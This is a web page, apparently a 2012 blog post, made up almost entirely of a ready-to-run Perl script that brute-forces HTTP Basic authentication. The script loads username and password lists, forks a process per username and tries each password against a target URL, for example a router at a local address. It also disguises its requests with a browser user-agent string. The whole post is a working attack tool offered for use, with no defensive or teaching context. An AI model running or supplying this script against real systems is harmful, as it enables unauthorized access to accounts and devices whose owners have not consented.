HTTP Authentication Bruteforcer
Code:#!/usr/bin/perl ################################################################# # HTTP Authentication Bruteforcer # # # ################################################################# use LWP::UserAgent; use Getopt::Std; my %options = (); my $users_file = undef; my $passw_file = undef; my @usernames = (); my @passwords = (); my $url = undef; my $main_pid = pid; banner(); getopts("u:p:h:",\%options); if( !defined($options{u}) or !defined($options{p}) or !defined($options{h}) ){ usage(); exit 1; } else{ $users_file = $options{u}; $passw_file = $options{p}; $url = $options{h}; } load_entries(); print( "@ PRESS RETURN TO START BRUTEFORCING ...\n" ); my $dummy = <STDIN>; print( "@ Starting bruteforcing against '$url' ...\n\n" ); foreach my $username ( @usernames ){ my $pid = fork(); if( not defined($pid) ){ die( "@ ERROR : Could not fork child process !\n" ); } elsif($pid == 0) { foreach my $password ( @passwords ){ print "@ Trying '$username : $password' ...\n"; if( http_authenticate( $url, $username, $password ) ){ print( "\n@ SUCCESSFULLY AUTHENTICATED WITH '$username - $password' !!!!\n" ); kill( 1, $main_pid ); } } } } sub banner{ print( "\n*********************************************\n" ); print( "* HTTP Authentication Bruteforcer *\n" ); print( "*********************************************\n\n" ); } sub usage{ print( "Usage : httpbrute.pl -u <users_file> -p <passwords_file> -h <HOST>\n\n" ); print( "\t<users_file> : File where to read usernames from .\n" ); print( "\t<passwords_file> : File where to read passwords from .\n" ); print( "\t<HOST> : Complete url to bruteforce .\n\n" ); print( "Example :\n\n" ); print( "\thttpbrute.pl -u usernames.txt -p passwords.txt -h http://192.168.1.1/\n" ); } # load usernames and passwords sub load_entries{ my $line = undef; # load users open( FILE,"<$users_file") or die( "@ ERROR : Could not open $users_file : $!\n" ); while( $line = <FILE>){ chomp($line); if( !($line =~ /^\#/) and length($line) ){ push( @usernames, $line ); } } close(FILE); $line = undef; # load passwords open( FILE,"<$passw_file") or die( "ERROR : Could not open $passw_file : $!\n" ); while( $line = <FILE>){ chomp($line); if( !($line =~ /^\#/) and length($line) ){ push( @passwords, $line ); } } close(FILE); print( "@ Loaded ".@usernames." usernames and ".@passwords." passwords .\n" ); } # attempt http basic authentication against $url sub http_authenticate{ my ( $url, $username, $password ) = @_; my $request = new HTTP::Request GET => $url; my $ua = new LWP::UserAgent; $ua->agent("Mozilla/4.5 [en] (Win95; U)"); $request->authorization_basic($username,$password); my $response = $ua->request($request); return $response->is_success; }
©2012, copyright BLACK BURN
0 comments:
Post a Comment